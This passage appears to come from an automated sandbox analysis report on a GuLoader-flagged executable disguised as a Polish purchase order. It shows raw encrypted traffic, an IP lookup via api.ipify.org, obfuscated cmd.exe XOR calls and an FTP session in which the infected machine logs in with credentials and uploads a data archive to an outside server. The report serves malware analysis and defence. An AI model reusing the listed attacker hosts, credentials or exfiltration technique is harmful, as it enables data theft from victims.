2023-01-25 09:05:53 UTC	62	IN	Data Raw: e6 b3 3a ca 73 bd 9b 51 8f 9b 49 ca 5f b4 cd e9 ac 19 d4 58 d3 73 c3 e2 43 58 03 ba d1 b3 81 81 26 46 05 55 f4 d0 e8 ae a7 e1 66 09 6d 9c 0b ca f3 50 45 50 8d 87 db 65 df 1b 4c a4 20 e0 87 ab fa 85 58 27 f5 48 3a a0 a1 87 a9 f7 90 15 d3 ec 3a 5b 32 85 f8 f7 18 23 df 6b 62 ce 74 a1 7c 5c 61 51 cd 54 b5 36 4e 78 84 b3 82 62 4a 21 00 c7 ce 5c ad 83 bb de f7 f0 0f 20 26 2d 34 60 52 ae fe 25 f7 54 05 f2 0a f4 4d 81 ba 16 0d 3c 0a 16 df c0 bf 14 10 e9 e7 db 1c 4c 50 50 bf a1 e7 4f 31 fc d2 cf ef 35 00 ad 1f fb 4e 5b cb 34 68 95 7f 04 dd c7 1a fd 89 9d cc 0e aa 58 e8 dd 7e ce e0 25 10 b4 4e ed 7e 9e c7 40 7c b2 33 e0 2d d2 8d 3c 74 4a 71 65 30 ea d5 73 96 ff 7f 99 b9 e8 e2 96 3c 03 00 46 b7 06 2f 35 eb e1 ec 04 ba ba 9a 15 e2 39 c8 e2 38 fd 9e cc 4d 05 f7 a7 80 Data Ascii: :sQI_XsCX&FUfmPEPeL X'H::[2#kbt\|\aQT6NxbJ!\ &-4`R%TM<LPPO15N[4hX~%N~@\|3-<tJqe0s<F/598M
2023-01-25 09:05:53 UTC	70	IN	Data Raw: 4a 06 04 01 11 3b 20 18 87 5b b3 d9 07 2d 75 c2 1e 73 e2 0a ed 17 b1 3b 17 be cb 37 56 63 7a d4 e7 b7 09 48 9c 8f 58 b1 01 09 5c d9 07 4d 1b bc 7d 75 5a 86 bd dc dc f1 f7 d5 c3 46 4b 8b 73 9a 82 45 8b 56 b5 c5 f8 af 0e f0 b6 2c 5e b7 ea 29 9e 14 e2 c6 b0 97 c8 ba 19 05 44 fe b6 da af 8b f0 70 24 03 10 99 ba 5e 3d 47 5a 9a e0 cc eb de 11 6a 2e b2 f2 8f a1 fa 86 31 5f f5 64 38 b0 95 78 56 02 a3 8b da ec 21 42 20 6a f4 54 49 23 c8 7a 11 0d 65 a9 67 27 b7 ca e0 56 98 1b e5 7e 7a 46 df 57 68 30 69 7d df 4e b7 57 98 f0 e6 8f b3 37 7e a4 49 7e 50 d7 38 e7 f7 50 2b cf 01 e4 22 3a ab 04 16 2a ef 27 f4 d8 48 1d 01 ed 82 d6 93 08 52 78 b9 da 24 45 42 8e ba 97 f6 34 1d e3 7b e8 4e 40 f1 b8 72 6b 78 2b fa ad 1f ec 89 f9 ed 27 b8 52 e3 e0 6d d5 9c 4d 11 a5 56 9d 53 61 Data Ascii: J; [-us;7VczHX\M}uZFKsEV,^)Dp$^=GZj.1_d8xV!B jTI#zeg'V~zFWh0i}NW7~I~P8P+":*'HRx$EB4{N@rkx+'RmMVSa
2023-01-25 09:05:53 UTC	78	IN	Data Raw: 14 d0 3b 82 24 48 20 c4 1d 61 a6 2c 39 59 3b ae 82 e0 24 c6 8b 8d 38 12 51 2c 50 21 ae 98 90 de 8d f7 b3 98 e9 5b 45 96 27 ce 91 63 d1 f5 0d 8e 1d 23 ae 07 29 be 31 5a 1c 06 1b 0e 25 d6 05 55 50 8e c2 03 7b 62 c9 05 ed 98 0a e9 17 a6 35 0b ce a3 0f 47 67 6f c8 d0 58 1b 5a 9a 8d 4d b1 ec 00 70 c0 37 62 e6 bd 51 7f 69 92 d9 a5 32 c6 df 29 c2 6c 30 37 7c 89 87 20 d1 4c b4 cd e9 ac 19 d4 59 d3 73 c3 e4 54 4a 3c 0d c3 b7 98 b6 2a 5c 16 4c fc dc 1e b0 84 0a 60 05 0a 06 b4 3a da 3c 41 76 94 f8 ac 6d df 00 68 19 32 0d 8e 87 ff ad 44 bd 9c 98 1a f4 1b 79 50 7b 26 07 db e6 51 4c 29 68 f1 db 0d 2b d7 72 94 cf 49 88 64 40 9b 5e e5 d8 f7 21 72 6e 7f 5d 78 c6 3d 2a 72 f3 a7 4e af bf b1 29 f5 8d b3 33 21 36 15 6d 58 d5 54 2d e8 5b d1 d1 24 fa 21 3d c4 e0 09 16 15 15 c3 Data Ascii: ;$H a,9Y;$8Q,P![E'c#)1Z%UP{b5GgoXZMp7bQi2)l07\| LYsTJ<\L`:<Avmh2DyP{&QL)h+rId@^!rn]x=rN)3!6mXT-[$!=
2023-01-25 09:05:53 UTC	86	IN	Data Raw: d6 6c 25 24 d5 78 68 60 23 d4 e7 14 0c bb 3e 8b 02 80 18 1a 49 60 e6 f2 77 75 34 5a 5c aa 12 b4 4e 95 29 09 90 0f e3 b8 69 fa 30 af 14 f9 db 27 95 fd 2e 9f c4 1d 38 00 c7 7c 95 25 48 2c e2 04 72 ae 3f 18 52 24 12 7c e1 08 69 9a 8b a4 27 42 28 69 8d b1 92 83 d6 9c e2 a0 7f 16 76 6e 8d 3c 5b 9e 7a cc f4 7e 66 18 3d 56 87 63 b4 38 50 88 7c 21 e5 2b d7 0a af 51 b3 d8 13 8b 67 eb 08 10 e7 18 ed 0c a9 3c 1d 44 ca 0a 55 6f 97 df d4 a8 31 81 87 8d 4e ac ee 0c 6c 2f 3e 50 02 ba 5d 41 d0 03 be e5 a2 ec b3 2d c5 e6 60 9a 7d 88 e2 fa cf 45 ad e3 f4 ae 15 cb 59 29 6f 11 e9 7e 5b 1d f5 9a ba 80 83 31 4e 14 40 e4 33 17 83 8e f6 6d 30 12 05 9c d8 df 25 b9 51 a7 ed a9 68 c5 02 64 06 2f f7 99 55 ea a1 46 d9 e3 77 36 98 08 7d 49 01 75 07 f7 ee 00 56 1c 21 06 24 e3 25 a7 64 Data Ascii: l%$xh`#>I`wu4Z\N)i0'.8\|%H,r?R$\|i'B(ivn<[z~f=Vc8P\|!+Qg<DUo1Nl/>P]A-`}EY)o~[1N@3m0%Qhd/UFw6}IuV!$%d
2023-01-25 09:05:53 UTC	94	IN	Data Raw: bd a5 3f bc 55 99 6f dd 34 43 e7 5e bf b5 ab 6a b0 ec 5a ec 4e b3 bd da 5f 7b d1 83 02 7b 91 bc 65 65 55 78 d3 6f 13 de be fe 83 b3 80 8d 78 5a 4a 76 98 b0 6a c0 d5 d7 62 24 24 c4 7e 67 ae 26 ed 1f 14 0c bb 3e f5 fc 91 0e 1b 4a 64 e4 f5 67 86 33 19 77 a8 05 b5 5d 94 15 cb 83 25 c9 ba 69 d1 d1 be 07 77 c6 23 fa d6 26 99 d8 33 b3 04 81 02 4b 2d 27 04 ca 04 74 82 31 21 40 20 dc 45 e0 08 ce 92 9a b1 4a 6b 2d 51 28 a0 96 f8 92 8c e6 bf ee 0b 58 69 83 13 d8 93 4e f4 f2 7e 7d 31 98 76 88 5d b8 cf 4e 29 15 13 15 5b c5 19 ab 5b 7e de 54 1a 46 c5 01 65 f8 77 cd 04 a3 22 0c 10 b1 37 50 75 6d f6 eb ad 1a 50 9b 9c 1a d7 d3 09 70 d5 17 50 1a bc 77 69 4b c4 c6 e1 cf ee b7 29 92 11 72 9b 7d 8d a5 40 cc 45 a1 94 37 b4 37 dd 5b 28 af 47 e8 52 5c ca ff c5 9f 8e 90 35 44 29 Data Ascii: ?Uo4C^jZN_{{eeUxoxZJvjb$$~g&>Jdg3w]%iw#&3K-'t1!@ EJk-Q(XiN~}1v]N)[[~TFew"7PumPpPwiK)r}@E77[(GR\5D)
2023-01-25 09:05:53 UTC	101	IN	Data Raw: d4 5e 50 20 83 41 c7 aa ee 17 8e 15 85 7e 15 b2 35 f1 bf 5b 25 73 0d 8e 52 2e f6 94 4f a3 6c a1 f6 45 9c 3e 1b af 2c cf 75 3d a5 7b f2 f5 8e 70 9a a4 4c e4 29 39 a7 b9 bb 64 b2 55 47 62 cd e6 44 cd 32 a4 a2 a0 60 6b f6 8e ed 62 b1 97 cf 67 22 2c 7c d5 7d e3 e5 65 6f 5f 52 cd 6d 20 a4 b9 fe ea 98 d6 8f ee 10 48 67 88 a1 6e d0 dd d4 62 22 26 d1 51 32 52 27 d2 e0 76 13 b2 3b a3 56 93 0e 17 3a 71 ce bd 63 8b 33 19 66 a8 05 b9 c0 fb 66 dd d3 21 c9 c5 69 d1 dd c2 1e 74 d7 2d 82 a4 3c c3 f8 00 98 7d bf 12 4f 21 62 04 ca 07 0f c0 2d 28 55 0e a7 7c f2 38 cf 9a 4e b5 31 51 ab 51 2c a0 84 88 ee 3a e6 bb 81 17 5d 71 7b 34 e6 83 64 b0 b7 7c 77 1a 0b 03 87 4f b4 27 5e 10 0f 3b 14 35 de 13 b2 5a a2 db 13 8b 67 eb 0e 61 9e 5f ef 06 a5 c4 83 63 ca 1b 50 7f 71 d5 f8 aa 01 Data Ascii: ^P A~5[%sR.OlE>,u={pL)9dUGbD2`kbg",\|}eo_Rm Hgnb"&Q2R'v;V:qc3ff!it-<}O!b-(U\|8N1QQ,:]q{4d\|wO'^;5Zga_cPq
2023-01-25 09:05:53 UTC	109	IN	Data Raw: 30 37 b3 51 f4 40 25 0f d5 42 3c 91 79 96 4e 95 ed be 5e d7 8b 40 96 34 66 4e 21 cd ff 62 c2 09 57 bd 5f 21 4a 61 b5 dd 2c 26 e9 65 ff 8f 55 2d 04 26 03 c0 57 32 8d bb 47 be 85 82 12 44 37 65 aa 1d 77 05 cb 96 29 9a a7 a1 54 a9 e6 69 8c 52 28 a9 dc 94 d6 42 9d 49 04 b5 17 21 ce 81 ce 75 37 8e 7f 11 af f7 19 0c da 09 85 16 4c d8 c1 c8 06 f5 5f 47 65 db ee a5 e4 34 7f bb ab 60 6c 12 83 9a 7d 38 20 40 d1 ed 58 38 f3 ec 1a 6b f0 f7 ea 69 d3 6f 08 c2 0a 5a f9 c2 df c4 86 1f 00 24 d0 ff 1d ba c9 91 22 69 6e a5 75 7b 50 27 42 3f 3b 2a 44 c1 74 ba 74 fd eb 9d 83 1f 11 87 95 35 76 5f 64 d0 02 32 75 db 64 7d b1 01 01 8a 43 2c 4e fd c0 34 a8 00 1a d7 32 70 b9 32 a7 6d 8d f5 99 e7 9c 75 08 72 ae 2c bb 35 ff f4 86 1c f2 77 7a 7d 4a cb a4 d0 b0 cf bf 92 83 d6 cc 30 91 Data Ascii: 07Q@%B<yN^@4fN!bW_!Ja,&eU-&W2GD7ew)TiR(BI!u7L_Ge4`l}8 @X8kioZ$"inu{P'B?;*Dtt5v_d2ud}C,N42p2mur,5wz}J0
2023-01-25 09:05:53 UTC	117	IN	Data Raw: 0e c1 9f 03 af c1 42 0a f8 14 d4 a7 87 49 dc 8c cd e0 ec 0b f0 d9 6f 08 9e 93 1e 97 ec 53 8f e6 1c be 07 10 7b f3 44 d7 60 fd d4 58 6e 47 10 1f a9 11 9a 1a b5 93 bc b2 a6 04 c5 7f e2 be 5b 81 19 6a 18 48 2b 78 68 15 59 bf 0b 75 8e 28 98 c2 f7 19 aa ba 07 15 b2 26 d7 c5 e8 92 76 ed c8 34 17 26 04 92 d7 00 58 69 5b 66 83 31 20 97 98 6d 56 20 89 67 04 fe 0f 6e 29 46 2d fb b0 1e 1d 19 2a cc 15 6a 4d 85 22 55 91 ee 42 e6 33 c1 76 30 9c 3e a4 56 fc cd bb ef 52 b5 02 25 55 a8 be 77 af 01 4c 2f a7 b9 7f 5f d2 1c e0 c5 7c f8 e8 41 89 0b 09 11 c2 d7 79 fd 6c d6 1c 00 70 fd e0 41 84 2a 7b 8c 69 14 78 01 da 27 88 eb 0d 4a 1e e4 b2 80 8d 11 c2 dc 5c 1a 3a ec 4e 2f 75 d9 a6 35 d5 79 7b 9f 35 be b0 f2 f5 4c 8e 6c be 3b ad b7 eb d1 48 48 c9 2b 88 e9 49 aa 05 bf 61 f2 21 Data Ascii: BIoS{D`XnG[jH+xhYu(&v4&Xi[f1 mV gn)F-jM"UB3v0>VR%UwL/_\|AylpA{ix'J\:N/u5y{5Ll;HH+Ia!
2023-01-25 09:05:53 UTC	125	IN	Data Raw: 41 4c 11 88 01 8b b5 a7 3b 9b 4f e5 1d 58 83 41 60 c4 f9 a8 90 23 10 b6 67 20 de 8c fd d6 1d ed 3d 28 15 ca 5d 9f 75 c3 5b fe ec 26 93 f3 9f 2f 66 59 04 21 99 2e ce f4 32 2b fa a1 2c 8a e2 00 26 3b 60 5e 9d 10 b8 25 0e 1a 4c 36 22 97 61 67 29 e7 0f 02 bc 49 d5 1c be 07 a2 7a 64 20 2d 99 15 38 ca 90 a8 18 e8 a9 11 0e e3 44 e7 6b 62 64 f1 23 9d 1a 7f 57 52 19 6a d3 15 fd 1c d0 8b fe 1d 86 fe 24 91 34 73 4e 82 bc bb 07 15 c4 9b 6c 8e f7 a0 69 b5 dd 29 17 31 00 88 cd 03 72 5c 63 47 99 34 22 8d bb 47 50 26 89 03 c2 72 ff 1e 97 e4 93 c5 17 ba 15 7d 20 5b 3a 51 61 48 40 a4 ee ba 03 ec 67 74 6b 36 9c 07 0a 13 9d c8 75 57 88 73 e0 f3 89 64 74 bc 7a ea 5a 24 86 a0 ab 68 aa f5 4e b6 ca 1e 45 99 20 0f b6 ad 60 f5 e5 a3 fd 48 b3 a4 c5 f4 78 d5 83 ab 73 27 fa 63 6f ca Data Ascii: AL;OXA`#g =(]u[&/fY!.2+,&;`^%L6"ag)Izd -8Dkbd#WRj$4sNli)1r\cG4"GP&r} [:QaH@gtk6uWsdtzZ$hNE `Hxs'co
2023-01-25 09:05:53 UTC	133	IN	Data Raw: 50 5a b3 ab ef 2d dd 3b 1d 06 47 14 e9 42 16 40 73 ff 83 fb 5b f2 b0 80 e2 b0 35 53 57 fd 0c bf 64 c5 01 08 ec de c9 b2 c3 d2 5f ec 87 4e 18 93 e3 8a f6 df 93 27 0c 35 0e 17 e6 66 f8 b5 41 3a 19 c9 91 18 56 93 cd 0f c4 da ef c5 eb 54 21 65 89 43 fb fd 22 a1 ce 3d 28 36 09 31 72 15 af 59 f0 ec de e2 f3 9d 2f 66 d2 53 74 9e 1f c2 f4 32 1a 89 5b 2d b9 e2 90 fa 69 79 74 9d 1e 77 6c 7d 1a c4 36 22 71 ed aa 2d 1c 63 0e bc 18 92 1c be 07 8f fc 6c a2 78 8c 10 36 b4 cc db 18 1f a9 11 e8 f2 c6 e5 66 6d 6a f1 37 ea 1a 7f 57 81 88 6a 51 1d 72 1c de bb 06 68 86 d3 24 91 a5 66 d9 80 ff b0 09 15 30 e6 6c 8e f7 8a ef ad 8f 34 3d 31 0e 90 c1 7b 72 5c 63 46 72 3c ee 89 40 47 5e 20 9d 1f de a1 ee 10 11 e3 06 50 1c b1 1b 19 0a b4 26 5b 61 8c b4 29 76 be 0e a4 62 a7 86 49 9c Data Ascii: PZ-;GB@s[5SWd_N'5fA:VT!eC"=(61rY/fSt2[-iytwl}6"q-clx6fmj7WjQrh$f0l4=1{r\cFr<@G^ P&[a)vbI
2023-01-25 09:05:53 UTC	140	IN	Data Raw: ed 0b c9 fd a6 4a 50 40 d4 28 f3 24 d3 c2 60 0b dc 32 c3 05 b5 1b 19 55 03 03 f3 a6 d1 55 e6 67 33 c7 38 69 f4 f0 43 f9 23 68 af 82 75 10 40 59 73 56 14 6f 65 7c ff 94 c7 b1 30 e9 d9 33 cb 9d 63 52 ea ef ab 10 fb 7c fa 8a 9a dd 4a ec e9 cc b9 38 01 53 8f 05 b6 67 52 fa 0e 23 cb 31 46 d4 f6 72 ba 85 78 12 09 65 bb 76 93 9d 44 0b 2c 3d 07 fb 86 f8 0c a7 2e 91 40 9c 7c 58 2a 5d 0e cd 46 ef 6e 7b d4 bf 06 20 74 ee 47 df b0 ce 24 34 89 81 18 f3 45 db 71 fe c5 25 0b f6 8a 2a 5f 50 6c 87 67 1b f6 f9 91 26 f9 51 14 ba cc 0e e8 31 20 5d f0 0d 67 2f 37 19 6f 27 36 9d dd 65 a4 f9 98 00 fd 4a bf 02 49 07 ee 7a c4 2e 58 91 d4 38 1e 9c 80 12 8e ab 04 2e 9c 4e c6 6a 96 62 97 21 d6 18 f3 5a f6 13 eb d1 4d e5 0b d5 32 fc f9 9d 24 24 10 36 30 57 48 b6 3b 05 43 dd 43 66 b7 Data Ascii: JP@($`2UUg38iC#hu@YsVoe\|03cR\|J8SgR#1FrxevD,=.@\|X]Fn{ tG$4Eq%_Plg&Q1 ]g/7o'6eJIz.X8.Njb!ZM2$$60WH;CCf
2023-01-25 09:05:53 UTC	148	IN	Data Raw: b9 3d 1f 44 48 7d d5 33 18 81 78 c3 2c a1 be 24 31 99 86 ea 9a 78 04 3d d9 35 1b b4 34 1d 85 05 a6 72 a3 ee 8e 02 10 13 4d 26 8a 15 a5 6e a4 71 00 71 1f cb c7 4f 2c f1 66 4d bb a2 3b d9 0d ef 4c 3d 35 65 a6 80 6f eb 42 53 48 8e 7f 81 4c ee 79 06 d6 8b 22 71 1b d5 a2 34 19 da 9a b3 9c 7d 35 37 ef e4 60 77 32 2a 3f 8a 03 dd 1e 76 f9 36 f0 c2 9f 45 5e 48 d2 6b 2e 74 e7 11 77 43 16 9c f7 a8 b4 84 85 f4 ad fe 54 37 2e 92 54 d2 08 8b 88 65 45 da 55 d7 b9 8d 2e ed ee 2d 77 f7 00 82 13 b8 f0 7d 40 5c 59 3d 88 02 91 d4 c9 6e f5 a2 ff 72 3c f6 41 29 b7 8e 8a bd 1e 01 d8 0e 43 25 91 98 d6 87 af 48 44 42 ce 43 95 72 c3 1d 8c 83 4b da 9e fc 48 03 53 00 fb f4 76 8a 9f 41 58 9b 3c 48 b9 a3 72 86 69 00 30 fa 75 77 66 61 77 b4 57 50 f2 a1 1e 4a 8f 02 6e db 2c e1 5f cc 62 Data Ascii: =DH}3x,$1x=54rM&nqqO,fM;L=5eoBSHLy"q4}57`w2*?v6E^Hk.twCT7.TeEU.-w}@\Y=nr<A)C%HDBCrKHSvAX<Hri0uwfawWPJn,_b
2023-01-25 09:05:53 UTC	156	IN	Data Raw: e5 fe d0 aa ec ed 60 e4 39 c6 fc 3a e3 ae 42 48 05 f0 8d e6 8b 52 d9 71 16 87 4e 8f 7d e3 be 75 af 72 d7 6a f4 93 4c 5d 02 56 04 79 49 81 e8 1c e0 89 2b fb cc ce 45 c2 cd bc 23 31 17 a3 b3 9f f8 7e a0 48 a9 e8 c1 f0 fb e5 fb a0 1f 02 76 b8 55 77 d5 57 7c a5 4c c2 17 c9 1a e7 76 69 42 2e 52 ab 64 c6 12 a3 10 06 10 fa 72 9a 04 5f 91 23 4c fc c9 52 bc 40 91 a8 e5 33 15 c6 e5 19 02 f5 30 25 e0 1a e9 49 aa 08 7d ba f7 4b 22 6d a6 db 45 76 93 f5 d6 f8 61 71 78 80 95 0e 00 c1 b8 59 e2 64 82 f1 a3 81 3f ba a2 e7 25 29 7b 91 0c 4c 11 e6 50 92 9e 7b fa 83 fa d5 f8 9b 9c c8 b1 32 5b 48 b2 0c a7 60 c5 e6 09 2d de 12 b3 cc d8 7f a3 86 40 10 95 62 86 7a d3 8a 2a 04 35 3f 6a 66 8f f6 b3 a0 38 93 d9 dd 15 5d 93 43 62 ca d4 eb e5 6b 56 b8 6a 27 43 e7 bc cb d4 cc 25 20 3e Data Ascii: `9:BHRqN}urjL]VyI+E#1~HvUwW\|LviB.Rdr_#LR@30%I}K"mEvaqxYd?%){LP{2[H`-@bz*5?jf8]CbkVj'C% >
2023-01-25 09:05:53 UTC	164	IN	Data Raw: 0e ef be ef a7 8e 76 55 f6 d9 4f c8 9d de cd be 64 83 60 8a d5 77 14 ad 99 2c 20 d2 e7 55 f4 ba 72 03 5e 6a 09 71 99 e8 26 87 30 11 cd 7f eb 29 07 7f a3 3c 41 3c 6a 3d ec df bd b4 e8 6d eb 2b 43 28 2a ef b0 4b cd fd f5 89 ef 0e ae dc 6f 09 03 6e 8a 7a e3 bc cc a7 54 c5 fa 7c 56 5b cc 3d 48 80 ba 44 05 d8 19 e7 8a 29 2e c4 e8 51 52 55 79 2d 38 8d 91 21 5d ef 77 85 54 a4 f2 43 3f f7 e2 af e8 18 0c 6d be 4d 7f d4 57 70 85 4c c2 17 cd b3 e6 76 4d 27 4a 76 d7 03 f1 62 fe 39 63 32 1f 8e b5 36 74 a5 35 60 9c fe 64 dd 6d b8 4b 6d 03 04 f7 d3 39 b6 4d 06 32 e1 1b fa 4d ad 0a 7f f2 fd 5b 75 1d c6 b7 1b 1b f9 b0 af 9a 18 06 2c eb fb 7c 46 29 2b 39 92 1e 91 7d 13 9c 31 82 85 df 03 0b 14 af 04 4a 11 e7 42 12 80 71 ff 83 fb dd ea e2 98 c8 b0 25 fc 49 92 0c 9f 64 c5 e7 Data Ascii: vUOd`w, Ur^jq&0)<A<j=m+C(*KonzT\|V[=HD).QRUy-8!]wTC?mMWpLvM'Jvb9c26t5`dmKm9M2M[u,\|F)+9}1JBq%Id

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49855	64.185.227.155	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-25 09:05:56 UTC	166	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2023-01-25 09:05:56 UTC	167	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * Content-Length: 13 Content-Type: text/plain Date: Wed, 25 Jan 2023 09:05:56 GMT Vary: Origin Connection: close
2023-01-25 09:05:56 UTC	167	IN	Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 39 Data Ascii: 102.129.143.9

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 25, 2023 10:06:00.092856884 CET	21	49856	192.185.87.146	192.168.11.20	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 03:06. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jan 25, 2023 10:06:00.095689058 CET	49856	21	192.168.11.20	192.185.87.146	USER senti@sentientshift.com
Jan 25, 2023 10:06:00.209908962 CET	21	49856	192.185.87.146	192.168.11.20	331 User senti@sentientshift.com OK. Password required
Jan 25, 2023 10:06:00.210305929 CET	49856	21	192.168.11.20	192.185.87.146	PASS @sentientshift.com
Jan 25, 2023 10:06:02.374598980 CET	21	49856	192.185.87.146	192.168.11.20	230 OK. Current restricted directory is /
Jan 25, 2023 10:06:02.489878893 CET	21	49856	192.185.87.146	192.168.11.20	504 Unknown command
Jan 25, 2023 10:06:02.490302086 CET	49856	21	192.168.11.20	192.185.87.146	PWD
Jan 25, 2023 10:06:02.605287075 CET	21	49856	192.185.87.146	192.168.11.20	257 "/" is your current location
Jan 25, 2023 10:06:02.605855942 CET	49856	21	192.168.11.20	192.185.87.146	TYPE I
Jan 25, 2023 10:06:02.720877886 CET	21	49856	192.185.87.146	192.168.11.20	200 TYPE is now 8-bit binary
Jan 25, 2023 10:06:02.721354008 CET	49856	21	192.168.11.20	192.185.87.146	PASV
Jan 25, 2023 10:06:02.836556911 CET	21	49856	192.185.87.146	192.168.11.20	227 Entering Passive Mode (192,185,87,146,155,26)
Jan 25, 2023 10:06:02.952943087 CET	49856	21	192.168.11.20	192.185.87.146	STOR CO_user-305090_2023_01_25_10_05_58.zip
Jan 25, 2023 10:06:03.068484068 CET	21	49856	192.185.87.146	192.168.11.20	150 Accepted data connection
Jan 25, 2023 10:06:03.300081968 CET	21	49856	192.185.87.146	192.168.11.20	226-File successfully transferred 226-File successfully transferred226 0.232 seconds (measured here), 103.72 Kbytes per second

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exePID: 4904, Parent PID: 4740

General

Target ID:	1
Start time:	10:03:56
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Imagebase:	0x400000
File size:	669600 bytes
MD5 hash:	17388D36388D280C4E2D724C9AB58002
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000001.00000002.14099095140.000000000071D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.14100531174.00000000058D8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exePID: 6448, Parent PID: 4904

General

Target ID:	3
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x0E^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Conhost.exePID: 1356, Parent PID: 6448

General

Target ID:	4
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 1420, Parent PID: 4904

General

Target ID:	5
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x19^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Conhost.exePID: 1260, Parent PID: 1420

General

Target ID:	6
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 1932, Parent PID: 4904

General

Target ID:	7
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x05^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Conhost.exePID: 7944, Parent PID: 1932

General

Target ID:	8
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 3356, Parent PID: 4904

General

Target ID:	9
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x0E^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Conhost.exePID: 7612, Parent PID: 3356

General

Target ID:	10
Start time:	10:04:09
Start date:	25/01/2023
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exePID: 4748, Parent PID: 4904

General

Target ID:	11
Start time:	10:04:10
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline:	cmd.exe /c set /A "0x07^75"
Imagebase:
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Conhost.exePID: 4600, Parent PID: 4748

General

Target ID:	12
Start time:	10:04:10
Start date:	25/01/2023
